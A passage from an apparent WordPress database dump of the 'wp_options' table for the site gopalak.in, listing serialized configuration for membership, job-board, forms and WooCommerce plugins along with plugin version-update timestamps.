the member area.\n\nThank You\";s:19:\"swpm-active-version\";s:5:\"4.6.2\";s:39:\"subscription-cancel-member-mail-subject\";s:59:\"Subscription payment agreement has been canceled or expired\";s:36:\"subscription-cancel-member-mail-body\";s:177:\"Dear {first_name}\n\nYour subscription payment agreement with the details below has been canceled or expired.\n\nMember ID: {member_id}\nSubscription ID: {subscription_id}\n\nThank You\";}','yes'),(187769,'swpm_private_key_one','64227c89905f87.47583419','yes'),(187770,'plugin_activation_simple-membership/simple-wp-membership.php','2023-03-28 11:05:05','yes'),(187918,'plugin_activation_restrict-user-access/restrict-user-access.php','2023-03-28 12:46:14','yes'),(187919,'rua_plugin_version','2.5','yes'),(187920,'_ca_condition_type_cache','a:1:{s:11:\"restriction\";a:0:{}}','yes'),(187956,'armlite_version','4.0.59','yes'),(187958,'arm_show_document_video','1','yes'),(187959,'arm_is_social_feature','0','yes'),(187960,'arm_preset_form_fields','a:1:{s:7:\"default\";a:10:{s:10:\"first_name\";a:9:{s:8:\"_builtin\";i:1;s:2:\"id\";s:10:\"first_name\";s:5:\"label\";s:10:\"First Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"first_name\";s:8:\"required\";i:0;s:14:\"hide_firstname\";i:0;s:17:\"invalid_firstname\";s:60:\"This first name is invalid. Please enter a valid first name.\";}s:9:\"last_name\";a:9:{s:8:\"_builtin\";i:1;s:2:\"id\";s:9:\"last_name\";s:5:\"label\";s:9:\"Last Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:9:\"last_name\";s:8:\"required\";i:0;s:13:\"hide_lastname\";i:0;s:16:\"invalid_lastname\";s:58:\"This last name is invalid. Please enter a valid last name.\";}s:12:\"display_name\";a:7:{s:8:\"_builtin\";i:1;s:2:\"id\";s:12:\"display_name\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:20:\"Profile Display Name\";s:11:\"placeholder\";s:0:\"\";s:8:\"meta_key\";s:12:\"display_name\";s:8:\"required\";i:0;}s:10:\"user_login\";a:10:{s:8:\"_builtin\";i:1;s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:8:\"required\";i:1;s:13:\"hide_username\";i:0;s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";}s:10:\"user_email\";a:10:{s:8:\"_builtin\";i:1;s:2:\"id\";s:10:\"user_email\";s:5:\"label\";s:13:\"Email Address\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:7:\"options\";a:1:{s:16:\"is_confirm_email\";i:0;}s:8:\"meta_key\";s:10:\"user_email\";s:8:\"required\";i:1;s:13:\"blank_message\";s:36:\"Email Address can not be left blank.\";s:15:\"invalid_message\";s:33:\"Please enter valid email address.\";}s:9:\"user_pass\";a:10:{s:8:\"_builtin\";i:1;s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:9:{s:14:\"strength_meter\";i:1;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:6;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:1;s:7:\"numeric\";i:1;s:9:\"uppercase\";i:1;s:9:\"lowercase\";i:1;s:15:\"is_confirm_pass\";i:0;}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";}s:6:\"gender\";a:9:{s:8:\"_builtin\";i:1;s:2:\"id\";s:6:\"gender\";s:4:\"type\";s:5:\"radio\";s:5:\"label\";s:6:\"Gender\";s:11:\"placeholder\";s:0:\"\";s:8:\"meta_key\";s:6:\"gender\";s:8:\"required\";i:0;s:7:\"options\";a:2:{s:4:\"male\";s:4:\"Male\";s:6:\"female\";s:6:\"Female\";}s:13:\"blank_message\";s:18:\"Please select one.\";}s:8:\"user_url\";a:9:{s:8:\"_builtin\";i:1;s:2:\"id\";s:8:\"user_url\";s:4:\"type\";s:3:\"url\";s:5:\"label\";s:13:\"Website (URL)\";s:11:\"placeholder\";s:0:\"\";s:8:\"meta_key\";s:8:\"user_url\";s:8:\"required\";i:0;s:13:\"blank_message\";s:36:\"Website (URL) can not be left blank.\";s:15:\"invalid_message\";s:11:\"Invalid URL\";}s:7:\"country\";a:9:{s:8:\"_builtin\";i:1;s:2:\"id\";s:7:\"country\";s:4:\"type\";s:6:\"select\";s:5:\"label\";s:14:\"Country/Region\";s:11:\"placeholder\";s:0:\"\";s:8:\"meta_key\";s:7:\"country\";s:8:\"required\";i:0;s:7:\"options\";a:212:{i:0;s:16:\"Country/Region:0\";i:1;s:13:\"Afghanistan:1\";i:2;s:9:\"Albania:2\";i:3;s:9:\"Algeria:3\";i:4;s:16:\"American Samoa:4\";i:5;s:9:\"Andorra:5\";i:6;s:8:\"Angola:6\";i:7;s:10:\"Anguilla:7\";i:8;s:12:\"Antarctica:8\";i:9;s:21:\"Antigua and Barbuda:9\";i:10;s:12:\"Argentina:10\";i:11;s:10:\"Armenia:11\";i:12;s:8:\"Aruba:12\";i:13;s:12:\"Australia:13\";i:14;s:10:\"Austria:14\";i:15;s:13:\"Azerbaijan:15\";i:16;s:10:\"Bahamas:16\";i:17;s:10:\"Bahrain:17\";i:18;s:13:\"Bangladesh:18\";i:19;s:11:\"Barbados:19\";i:20;s:10:\"Belarus:20\";i:21;s:10:\"Belgium:21\";i:22;s:9:\"Belize:22\";i:23;s:8:\"Benin:23\";i:24;s:10:\"Bermuda:24\";i:25;s:9:\"Bhutan:25\";i:26;s:10:\"Bolivia:26\";i:27;s:25:\"Bosnia and Herzegovina:27\";i:28;s:11:\"Botswana:28\";i:29;s:9:\"Brazil:29\";i:30;s:9:\"Brunei:30\";i:31;s:11:\"Bulgaria:31\";i:32;s:15:\"Burkina Faso:32\";i:33;s:10:\"Burundi:33\";i:34;s:11:\"Cambodia:34\";i:35;s:11:\"Cameroon:35\";i:36;s:9:\"Canada:36\";i:37;s:13:\"Cape Verde:37\";i:38;s:17:\"Cayman Islands:38\";i:39;s:27:\"Central African Republic:39\";i:40;s:7:\"Chad:40\";i:41;s:8:\"Chile:41\";i:42;s:8:\"China:42\";i:43;s:11:\"Colombia:43\";i:44;s:10:\"Comoros:44\";i:45;s:8:\"Congo:45\";i:46;s:13:\"Costa Rica:46\";i:47;s:10:\"Croatia:47\";i:48;s:7:\"Cuba:48\";i:49;s:9:\"Cyprus:49\";i:50;s:17:\"Czech Republic:50\";i:51;s:10:\"Denmark:51\";i:52;s:11:\"Djibouti:52\";i:53;s:11:\"Dominica:53\";i:54;s:21:\"Dominican Republic:54\";i:55;s:13:\"East Timor:55\";i:56;s:10:\"Ecuador:56\";i:57;s:8:\"Egypt:57\";i:58;s:14:\"El Salvador:58\";i:59;s:20:\"Equatorial Guinea:59\";i:60;s:10:\"Eritrea:60\";i:61;s:10:\"Estonia:61\";i:62;s:11:\"Ethiopia:62\";i:63;s:7:\"Fiji:63\";i:64;s:10:\"Finland:64\";i:65;s:9:\"France:65\";i:66;s:16:\"French Guiana:66\";i:67;s:19:\"French Polynesia:67\";i:68;s:8:\"Gabon:68\";i:69;s:9:\"Gambia:69\";i:70;s:10:\"Georgia:70\";i:71;s:10:\"Germany:71\";i:72;s:8:\"Ghana:72\";i:73;s:12:\"Gibraltar:73\";i:74;s:9:\"Greece:74\";i:75;s:12:\"Greenland:75\";i:76;s:10:\"Grenada:76\";i:77;s:7:\"Guam:77\";i:78;s:12:\"Guatemala:78\";i:79;s:9:\"Guinea:79\";i:80;s:16:\"Guinea-Bissau:80\";i:81;s:9:\"Guyana:81\";i:82;s:8:\"Haiti:82\";i:83;s:11:\"Honduras:83\";i:84;s:12:\"Hong Kong:84\";i:85;s:10:\"Hungary:85\";i:86;s:10:\"Iceland:86\";i:87;s:8:\"India:87\";i:88;s:12:\"Indonesia:88\";i:89;s:7:\"Iran:89\";i:90;s:7:\"Iraq:90\";i:91;s:10:\"Ireland:91\";i:92;s:9:\"Israel:92\";i:93;s:8:\"Italy:93\";i:94;s:10:\"Jamaica:94\";i:95;s:8:\"Japan:95\";i:96;s:9:\"Jordan:96\";i:97;s:13:\"Kazakhstan:97\";i:98;s:8:\"Kenya:98\";i:99;s:11:\"Kiribati:99\";i:100;s:15:\"North Korea:100\";i:101;s:15:\"South Korea:101\";i:102;s:10:\"Kuwait:102\";i:103;s:14:\"Kyrgyzstan:103\";i:104;s:8:\"Laos:104\";i:105;s:10:\"Latvia:105\";i:106;s:11:\"Lebanon:106\";i:107;s:11:\"Lesotho:107\";i:108;s:11:\"Liberia:108\";i:109;s:9:\"Libya:109\";i:110;s:17:\"Liechtenstein:110\";i:111;s:13:\"Lithuania:111\";i:112;s:14:\"Luxembourg:112\";i:113;s:13:\"Macedonia:113\";i:114;s:14:\"Madagascar:114\";i:115;s:10:\"Malawi:115\";i:116;s:12:\"Malaysia:116\";i:117;s:12:\"Maldives:117\";i:118;s:8:\"Mali:118\";i:119;s:9:\"Malta:119\";i:120;s:20:\"Marshall Islands:120\";i:121;s:14:\"Mauritania:121\";i:122;s:13:\"Mauritius:122\";i:123;s:10:\"Mexico:123\";i:124;s:14:\"Micronesia:124\";i:125;s:11:\"Moldova:125\";i:126;s:10:\"Monaco:126\";i:127;s:12:\"Mongolia:127\";i:128;s:14:\"Montenegro:128\";i:129;s:14:\"Montserrat:129\";i:130;s:11:\"Morocco:130\";i:131;s:14:\"Mozambique:131\";i:132;s:11:\"Myanmar:132\";i:133;s:11:\"Namibia:133\";i:134;s:9:\"Nauru:134\";i:135;s:9:\"Nepal:135\";i:136;s:15:\"Netherlands:136\";i:137;s:15:\"New Zealand:137\";i:138;s:13:\"Nicaragua:138\";i:139;s:9:\"Niger:139\";i:140;s:11:\"Nigeria:140\";i:141;s:10:\"Norway:141\";i:142;s:28:\"Northern Mariana Islands:142\";i:143;s:8:\"Oman:143\";i:144;s:12:\"Pakistan:144\";i:145;s:9:\"Palau:145\";i:146;s:13:\"Palestine:146\";i:147;s:10:\"Panama:147\";i:148;s:20:\"Papua New Guinea:148\";i:149;s:12:\"Paraguay:149\";i:150;s:8:\"Peru:150\";i:151;s:15:\"Philippines:151\";i:152;s:10:\"Poland:152\";i:153;s:12:\"Portugal:153\";i:154;s:15:\"Puerto Rico:154\";i:155;s:9:\"Qatar:155\";i:156;s:18:\"Reunion Island:156\";i:157;s:11:\"Romania:157\";i:158;s:10:\"Russia:158\";i:159;s:10:\"Rwanda:159\";i:160;s:25:\"Saint Kitts and Nevis:160\";i:161;s:15:\"Saint Lucia:161\";i:162;s:36:\"Saint Vincent and the Grenadines:162\";i:163;s:9:\"Samoa:163\";i:164;s:14:\"San Marino:164\";i:165;s:25:\"Sao Tome and Principe:165\";i:166;s:16:\"Saudi Arabia:166\";i:167;s:11:\"Senegal:167\";i:168;s:25:\"Serbia and Montenegro:168\";i:169;s:14:\"Seychelles:169\";i:170;s:16:\"Sierra Leone:170\";i:171;s:13:\"Singapore:171\";i:172;s:12:\"Slovakia:172\";i:173;s:12:\"Slovenia:173\";i:174;s:19:\"Solomon Islands:174\";i:175;s:11:\"Somalia:175\";i:176;s:16:\"South Africa:176\";i:177;s:9:\"Spain:177\";i:178;s:13:\"Sri Lanka:178\";i:179;s:9:\"Sudan:179\";i:180;s:12:\"Suriname:180\";i:181;s:13:\"Swaziland:181\";i:182;s:10:\"Sweden:182\";i:183;s:15:\"Switzerland:183\";i:184;s:9:\"Syria:184\";i:185;s:10:\"Taiwan:185\";i:186;s:14:\"Tajikistan:186\";i:187;s:12:\"Tanzania:187\";i:188;s:12:\"Thailand:188\";i:189;s:8:\"Togo:189\";i:190;s:9:\"Tonga:190\";i:191;s:23:\"Trinidad and Tobago:191\";i:192;s:11:\"Tunisia:192\";i:193;s:10:\"Turkey:193\";i:194;s:16:\"Turkmenistan:194\";i:195;s:10:\"Tuvalu:195\";i:196;s:10:\"Uganda:196\";i:197;s:11:\"Ukraine:197\";i:198;s:24:\"United Arab Emirates:198\";i:199;s:18:\"United Kingdom:199\";i:200;s:17:\"United States:200\";i:201;s:11:\"Uruguay:201\";i:202;s:14:\"Uzbekistan:202\";i:203;s:11:\"Vanuatu:203\";i:204;s:16:\"Vatican City:204\";i:205;s:13:\"Venezuela:205\";i:206;s:11:\"Vietnam:206\";i:207;s:27:\"Virgin Islands, British:207\";i:208;s:24:\"Virgin Islands, U.S.:208\";i:209;s:9:\"Yemen:209\";i:210;s:10:\"Zambia:210\";i:211;s:12:\"Zimbabwe:211\";}s:13:\"blank_message\";s:33:\"Please select atleast one option.\";}s:11:\"description\";a:8:{s:8:\"_builtin\";i:1;s:2:\"id\";s:11:\"description\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:9:\"Biography\";s:11:\"placeholder\";s:0:\"\";s:8:\"meta_key\";s:11:\"description\";s:8:\"required\";i:0;s:13:\"blank_message\";s:32:\"Biography can not be left blank.\";}}}','yes'),(187961,'arm_global_settings','a:2:{s:16:\"general_settings\";a:34:{s:14:\"hide_admin_bar\";i:0;s:31:\"arm_exclude_role_for_hide_admin\";i:0;s:20:\"restrict_admin_panel\";i:0;s:35:\"arm_exclude_role_for_restrict_admin\";i:0;s:13:\"hide_wp_login\";i:0;s:15:\"rename_wp_admin\";i:0;s:18:\"temp_wp_admin_path\";s:0:\"\";s:17:\"new_wp_admin_path\";s:8:\"wp-admin\";s:18:\"hide_register_link\";i:0;s:26:\"user_register_verification\";s:4:\"auto\";s:21:\"arm_new_signup_status\";i:1;s:9:\"hide_feed\";i:0;s:22:\"disable_wp_login_style\";i:0;s:20:\"restrict_site_access\";i:0;s:33:\"arm_access_page_for_restrict_site\";i:0;s:23:\"autolock_shared_account\";i:0;s:15:\"paymentcurrency\";s:3:\"USD\";s:30:\"arm_specific_currency_position\";s:6:\"suffix\";s:15:\"custom_currency\";a:4:{s:6:\"status\";i:0;s:6:\"symbol\";s:0:\"\";s:9:\"shortname\";s:0:\"\";s:5:\"place\";s:6:\"prefix\";}s:10:\"enable_tax\";i:0;s:10:\"tax_amount\";i:0;s:22:\"file_upload_size_limit\";s:1:\"2\";s:15:\"enable_gravatar\";i:1;s:11:\"enable_crop\";i:1;s:15:\"spam_protection\";i:1;s:18:\"enqueue_all_js_css\";i:0;s:17:\"global_custom_css\";s:0:\"\";s:11:\"badge_width\";i:30;s:12:\"badge_height\";i:30;s:22:\"profile_permalink_base\";s:10:\"user_login\";s:20:\"bbpress_profile_page\";i:0;s:24:\"arm_email_schedular_time\";i:12;s:20:\"arm_invoice_template\";s:2929:\"<div id=\"arm_invoice_div\" class=\"entry-content ms-invoice\"><style>#arm_invoice_div table, th, td { margin: 0; font-size: 14px; }#arm_invoice_div table { padding: 0; border: 1px solid #DDD; width: 100%; background-color: #FFF; box-shadow: 0 1px 8px #F0F0F0; }#arm_invoice_div th, td { border: 0; padding: 8px; }#arm_invoice_div th { font-weight: bold; text-align: left; text-transform: none; font-size: 13px; }#arm_invoice_div tr.alt { background-color: #F9F9F9; }#arm_invoice_div tr.sep th, #arm_invoice_div tr.sep td { border-top: 1px solid #DDD; padding-top: 16px; }#arm_invoice_div tr.space th, #arm_invoice_div tr.space td { padding-bottom: 16px; }#arm_invoice_div tr.ms-inv-sep th,#arm_invoice_div tr.ms-inv-sep td { line-height: 1px; height: 1px; padding: 0; border-bottom: 1px solid #DDD; background-color: #F9F9F9; }#arm_invoice_div .ms-inv-total .ms-inv-price { font-weight: bold; font-size: 18px; text-align: right; }#arm_invoice_div h2 { text-align: right; padding: 0 10px 0 0; }#arm_invoice_div h2 a { color: #000; }</style><div class=\"ms-invoice-details ms-status-paid\"><table class=\"ms-purchase-table\" cellspacing=\"0\"><tbody><tr class=\"ms-inv-title\"><td colspan=\"2\"><h2>Invoice {ARM_INVOICE_INVOICEID}</h2><div style=\"text-align: right; padding: 0px 10px 10px 0px;\">{ARM_INVOICE_PAYMENTDATE}</div></td></tr><tr class=\"ms-inv-to alt space sep\"><th>Invoice to</th><td class=\"ms-inv-text\">{ARM_INVOICE_USERFIRSTNAME} {ARM_INVOICE_USERLASTNAME} ( {ARM_INVOICE_PAYEREMAIL} )</td></tr><tr class=\"ms-inv-item-name space\"><th>Plan Name</th><td class=\"ms-inv-text\">{ARM_INVOICE_SUBSCRIPTIONNAME}</td></tr><tr class=\"ms-inv-description alt space\"><th>Description</th><td class=\"ms-inv-text\">{ARM_INVOICE_SUBSCRIPTIONDESCRIPTION}</td></tr><tr class=\"ms-inv-amount space\"><th>Plan Amount</th><td class=\"ms-inv-price\">{ARM_INVOICE_AMOUNT}</td></tr><tr class=\"ms-inv-amount alt space\"><th>transaction Id</th><td class=\"ms-inv-price\">{ARM_INVOICE_TRANSACTIONID}</td></tr><tr class=\"ms-inv-amount space\"><th>subscription id</th><td class=\"ms-inv-price\">{ARM_INVOICE_SUBSCRIPTIONID}</td></tr><tr class=\"ms-inv-amount space alt\"><th>payment gateway</th><td class=\"ms-inv-price\">{ARM_INVOICE_GATEWAY}</td></tr><tr class=\"ms-inv-amount space\"><th>trial amount</th><td class=\"ms-inv-price\">{ARM_INVOICE_TRIALAMOUNT}</td></tr><tr class=\"ms-inv-amount space alt\"><th>trial period</th><td class=\"ms-inv-price\">{ARM_INVOICE_TRIALPERIOD}</td></tr><tr class=\"ms-inv-amount space\"><th>coupon code</th><td class=\"ms-inv-price\">{ARM_INVOICE_COUPONCODE}</td></tr><tr class=\"ms-inv-amount alt space\"><th>coupon discount</th><td class=\"ms-inv-price\">{ARM_INVOICE_COUPONAMOUNT}</td></tr><tr class=\"ms-inv-amount alt space\"><th>Tax Percentage</th><td class=\"ms-inv-price\">{ARM_INVOICE_TAXPERCENTAGE}</td></tr><tr class=\"ms-inv-amount alt space\"><th>Tax Amount</th><td class=\"ms-inv-price\">{ARM_INVOICE_TAXAMOUNT}</td></tr></tbody></table></div></div>\";s:14:\"front_settings\";a:6:{s:12:\"level_1_font\";a:6:{s:11:\"font_family\";s:9:\"Open Sans\";s:9:\"font_size\";s:2:\"18\";s:10:\"font_color\";s:7:\"#32323a\";s:9:\"font_bold\";i:1;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:12:\"level_2_font\";a:6:{s:11:\"font_family\";s:9:\"Open Sans\";s:9:\"font_size\";s:2:\"16\";s:10:\"font_color\";s:7:\"#32323a\";s:9:\"font_bold\";i:1;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:12:\"level_3_font\";a:6:{s:11:\"font_family\";s:9:\"Open Sans\";s:9:\"font_size\";s:2:\"15\";s:10:\"font_color\";s:7:\"#727277\";s:9:\"font_bold\";i:0;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:12:\"level_4_font\";a:6:{s:11:\"font_family\";s:9:\"Open Sans\";s:9:\"font_size\";s:2:\"14\";s:10:\"font_color\";s:7:\"#727277\";s:9:\"font_bold\";i:0;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:9:\"link_font\";a:6:{s:11:\"font_family\";s:9:\"Open Sans\";s:9:\"font_size\";s:2:\"14\";s:10:\"font_color\";s:7:\"#0c7cd5\";s:9:\"font_bold\";i:0;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:11:\"button_font\";a:6:{s:11:\"font_family\";s:9:\"Open Sans\";s:9:\"font_size\";s:2:\"14\";s:10:\"font_color\";s:7:\"#FFFFFF\";s:9:\"font_bold\";i:0;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}}}s:13:\"page_settings\";a:10:{s:16:\"register_page_id\";i:2043;s:13:\"login_page_id\";i:2044;s:23:\"forgot_password_page_id\";i:2045;s:20:\"edit_profile_page_id\";i:2046;s:23:\"change_password_page_id\";i:2047;s:22:\"member_profile_page_id\";i:0;s:14:\"logout_page_id\";i:0;s:13:\"guest_page_id\";i:2048;s:17:\"thank_you_page_id\";i:2049;s:22:\"cancel_payment_page_id\";i:2050;}}','yes'),(187962,'arm_block_settings','a:11:{s:21:\"failed_login_lockdown\";i:1;s:23:\"remained_login_attempts\";i:1;s:19:\"track_login_history\";i:1;s:17:\"max_login_retries\";i:5;s:27:\"temporary_lockdown_duration\";i:10;s:23:\"permanent_login_retries\";i:15;s:27:\"permanent_lockdown_duration\";i:24;s:19:\"arm_block_usernames\";s:0:\"\";s:23:\"arm_block_usernames_msg\";s:38:\"Username should not contain bad words.\";s:16:\"arm_block_emails\";s:0:\"\";s:20:\"arm_block_emails_msg\";s:43:\"Email Address should not contain bad words.\";}','yes'),(187963,'plugin_activation_armember-membership/armember-membership.php','2023-03-28 12:50:18','yes'),(187964,'widget_arm_member_form_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(187965,'widget_arm_member_form_widget_latest_members','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(187966,'widget_arm_member_form_login_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(187970,'arm_redirection_settings','a:7:{s:5:\"login\";a:6:{s:9:\"main_type\";s:5:\"fixed\";s:4:\"type\";s:8:\"referral\";s:7:\"page_id\";s:4:\"2046\";s:3:\"url\";s:18:\"https://gopalak.in\";s:8:\"refferel\";s:18:\"https://gopalak.in\";s:20:\"conditional_redirect\";a:2:{i:0;a:4:{s:7:\"plan_id\";s:1:\"0\";s:9:\"condition\";s:0:\"\";s:6:\"expire\";s:1:\"0\";s:3:\"url\";s:0:\"\";}s:7:\"default\";s:18:\"https://gopalak.in\";}}s:6:\"signup\";a:7:{s:13:\"redirect_type\";s:6:\"common\";s:4:\"type\";s:8:\"referral\";s:7:\"page_id\";s:4:\"2046\";s:3:\"url\";s:18:\"https://gopalak.in\";s:8:\"refferel\";s:18:\"https://gopalak.in\";s:20:\"conditional_redirect\";a:1:{i:0;a:2:{s:7:\"form_id\";s:1:\"0\";s:3:\"url\";s:0:\"\";}}s:7:\"default\";s:18:\"https://gopalak.in\";}s:12:\"setup_signup\";a:4:{s:4:\"type\";s:3:\"url\";s:7:\"page_id\";s:4:\"2049\";s:3:\"url\";s:18:\"https://gopalak.in\";s:20:\"conditional_redirect\";a:1:{i:0;a:2:{s:7:\"plan_id\";s:1:\"0\";s:3:\"url\";s:0:\"\";}}}s:12:\"setup_change\";a:3:{s:4:\"type\";s:3:\"url\";s:7:\"page_id\";s:4:\"2049\";s:3:\"url\";s:18:\"https://gopalak.in\";}s:11:\"setup_renew\";a:3:{s:4:\"type\";s:3:\"url\";s:7:\"page_id\";s:4:\"2049\";s:3:\"url\";s:18:\"https://gopalak.in\";}s:5:\"setup\";a:1:{s:7:\"default\";s:18:\"https://gopalak.in\";}s:20:\"default_access_rules\";a:2:{s:13:\"non_logged_in\";a:2:{s:4:\"type\";s:8:\"specific\";s:11:\"redirect_to\";s:4:\"2044\";}s:9:\"logged_in\";a:2:{s:4:\"type\";s:4:\"home\";s:11:\"redirect_to\";s:0:\"\";}}}','yes'),(187975,'arm_show_document_video_on','1680871843','yes'),(188025,'swpm-messages','a:0:{}','yes'),(188880,'wpforms_settings','a:2:{s:13:\"modern-markup\";s:1:\"0\";s:20:\"modern-markup-is-set\";b:1;}','yes'),(191643,'one_cc_address_sync_cron','a:4:{s:6:\"status\";s:9:\"cancelled\";s:11:\"cron_status\";s:7:\"deleted\";s:7:\"message\";s:20:\"invalid_1cc_merchant\";s:10:\"updated_at\";i:1681461183;}','yes'),(194364,'arm_lite_new_version_installed','1','yes'),(194365,'arm_lite_version_updated_date_4.0.1','2023-04-28 04:38:14','yes'),(196030,'arm_lite_version_updated_date_4.0.2','2023-05-07 07:14:02','yes'),(197877,'jb_last_version_upgrade','1.2.5','yes'),(197878,'jb_first_activation_date','1683893184','yes'),(197879,'jb_version','1.2.5','yes'),(197880,'jb_job-slug','job','yes'),(197881,'jb_job-type-slug','job-type','yes'),(197882,'jb_job-category-slug','job-category','yes'),(197883,'jb_job-categories','1','yes'),(197884,'jb_job-template','','yes'),(197885,'jb_job-archive-template','','yes'),(197886,'jb_job-dateformat','default','yes'),(197887,'jb_job-breadcrumbs','','yes'),(197888,'jb_googlemaps-api-key','','yes'),(197889,'jb_disable-structured-data','','yes'),(197890,'jb_jobs-list-pagination','10','yes'),(197891,'jb_jobs-list-no-logo','','yes'),(197892,'jb_jobs-list-hide-filled','','yes'),(197893,'jb_jobs-list-hide-expired','','yes'),(197894,'jb_jobs-list-hide-search','','yes'),(197895,'jb_jobs-list-hide-location-search','','yes'),(197896,'jb_jobs-list-hide-filters','','yes'),(197897,'jb_jobs-list-hide-job-types','','yes'),(197898,'jb_jobs-dashboard-pagination','10','yes'),(197899,'jb_account-required','','yes'),(197900,'jb_account-creation','1','yes'),(197901,'jb_account-username-generate','1','yes'),(197902,'jb_account-password-email','1','yes'),(197903,'jb_full-name-required','1','yes'),(197904,'jb_your-details-section','','yes'),(197905,'jb_account-role','jb_employer','yes'),(197906,'jb_job-moderation','1','yes'),(197907,'jb_pending-job-editing','1','yes'),(197908,'jb_published-job-editing','1','yes'),(197909,'jb_individual-job-duration','','yes'),(197910,'jb_job-duration','30','yes'),(197911,'jb_job-expiration-reminder','','yes'),(197912,'jb_job-expiration-reminder-time','','yes'),(197913,'jb_required-job-type','1','yes'),(197914,'jb_application-method','','yes'),(197915,'jb_job-submitted-notice','Thank you for submitting your job. It will be appear on the website once approved.','yes'),(197916,'jb_disable-styles','','yes'),(197917,'jb_disable-fa-styles','','yes'),(197918,'jb_admin_email','namaste@gopalak.in','yes'),(197919,'jb_mail_from','Gopalak','yes'),(197920,'jb_mail_from_addr','namaste@gopalak.in','yes'),(197921,'jb_uninstall-delete-settings','','yes'),(197922,'jb_job_submitted_on','1','yes'),(197923,'jb_job_submitted_sub','New Job Submission - {site_name}','yes'),(197924,'jb_job_approved_on','1','yes'),(197925,'jb_job_approved_sub','Job listing is now live - {site_name}','yes'),(197926,'jb_job_edited_on','1','yes'),(197927,'jb_job_edited_sub','A job listing has been edited - {site_name}','yes'),(197928,'jb_job_expiration_reminder_on','1','yes'),(197929,'jb_job_expiration_reminder_sub','Your job will expire in {job_expiration_days} days - {site_name}','yes'),(197930,'jb_jobs_page','2055','yes'),(197931,'jb_job-post_page','2056','yes'),(197932,'jb_jobs-dashboard_page','2057','yes'),(197939,'jb-job-type_children','a:0:{}','yes'),(197941,'plugin_activation_jobboardwp/jobboardwp.php','2023-05-12 17:36:24','yes'),(197942,'widget_jb_recent_jobs','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(198019,'jb-job-category_children','a:0:{}','yes'),(204166,'arm_lite_version_updated_date_4.0.3','2023-06-04 04:39:33','yes'),(205066,'_wpforms_transient_timeout_docs.json','1747511731','no'),(205067,'_wpforms_transient_docs.json','1746906931','no'),(205806,'woocommerce_feature_product_block_editor_enabled','no','yes'),(205828,'arm_lite_version_updated_date_4.0.4','2023-06-14 08:10:24','yes'),(207795,'arm_lite_version_updated_date_4.0.5','2023-06-23 07:55:24','yes'),(212228,'arm_lite_version_updated_date_4.0.7','2023-07-07 04:40:37','yes'),(213969,'jb_template_statuses','a:0:{}','yes'),(228235,'wc_blocks_use_blockified_product_grid_block_as_template','no','yes'),(228236,'wc_blocks_version','11.8.0-dev','yes'),(228237,'jetpack_connection_active_plugins','a:1:{s:11:\"woocommerce\";a:1:{s:4:\"name\";s:11:\"WooCommerce\";}}','yes'),(228250,'jetpack_options','a:1:{s:14:\"last_heartbeat\";i:1747374285;}','yes'),(242680,'arm_lite_version_updated_date_4.0.8','2023-07-29 08:45:26','yes'),(257308,'woocommerce_custom_orders_table_enabled','no','yes'),(257309,'woocommerce_custom_orders_table_data_sync_enabled','no','yes'),(257310,'woocommerce_custom_orders_table_created','yes','yes'),(264430,'arm_lite_version_updated_date_4.0.9','2023-08-16 05:44:12','yes'),(266268,'arm_lite_version_updated_date_4.0.10','2023-08-18 04:56:54','yes'),(283234,'arm_lite_is_wizard_complete','1','yes'),(283235,'arm_lite_version_updated_date_4.0.11','2023-09-01 04:27:01','yes'),(289330,'wcpay_was_in_use','no','yes'),(304701,'arm_lite_version_updated_date_4.0.12','2023-09-24 03:59:33','yes'),(316205,'woocommerce_feature_marketplace_enabled','yes','yes'),(316454,'arm_lite_version_updated_date_4.0.13','2023-10-13 04:46:06','yes'),(316737,'arm_lite_version_updated_date_4.0.14','2023-10-14 04:02:27','yes'),(322635,'arm_lite_version_updated_date_4.0.15','2023-10-27 06:05:11','yes'),(328129,'arm_lite_version_updated_date_4.0.16','2023-11-03 03:32:50','yes'),(330834,'wp_attachment_pages_enabled','1','yes'),(332581,'arm_lite_display_bf_offers','1','yes'),(332582,'arm_lite_version_updated_date_4.0.17','2023-11-10 04:56:46','yes'),(341409,'arm_lite_version_updated_date_4.0.18','2023-11-21 04:38:03','yes'),(347031,'arm_lite_version_updated_date_4.0.19','2023-11-28 04:27:38','yes'),(359207,'woocommerce_store_id','63e3b07d-9d1c-4afc-aec0-d07d9771dd50','yes'),(365203,'arm_lite_version_updated_date_4.0.20','2023-12-22 05:52:43','yes'),(365243,'zmail_plugin_installed','1','yes'),(365246,'swpm_plugin_user_feedback_notice','a:2:{s:4:\"time\";i:1703215285;s:9:\"dismissed\";b:0;}','yes'),(366496,'arm_lite_version_updated_date_4.0.21','2023-12-29 11:20:49','yes'),(366855,'arm_lite_version_updated_date_4.0.22','2023-12-31 